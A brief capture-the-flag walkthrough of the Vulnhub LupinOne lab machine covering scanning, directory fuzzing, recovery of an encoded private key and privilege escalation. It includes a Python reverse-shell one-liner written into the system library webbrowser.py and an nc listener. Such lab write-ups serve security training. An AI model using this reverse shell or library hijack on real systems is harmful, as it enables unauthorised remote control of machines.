Today we will take a look at Vulnhub: LupinOne. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open 192.168.0.110 — open
Let’s look at the “~ myfiles” extension.
Command: ffuf -u ‘http://lupin/~FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here we have a username. Now let’s find his private key file. As we know, private keys “.” is written after the symbol.
Command: ffuf -u ‘http://lupin/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub -fw 20
We found the encrypted text. Let’s look at cyberchef to decrypt. After researching, I found that it was base58
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Let’s check the connection to the target machine.
We use the fasttrack.txt file to crack the passphrase password, as stated in the message.
Command: echo ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’ >> /usr/lib/python3.9/webbrowser.py
Command: nc -nvlp 4242
Command: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”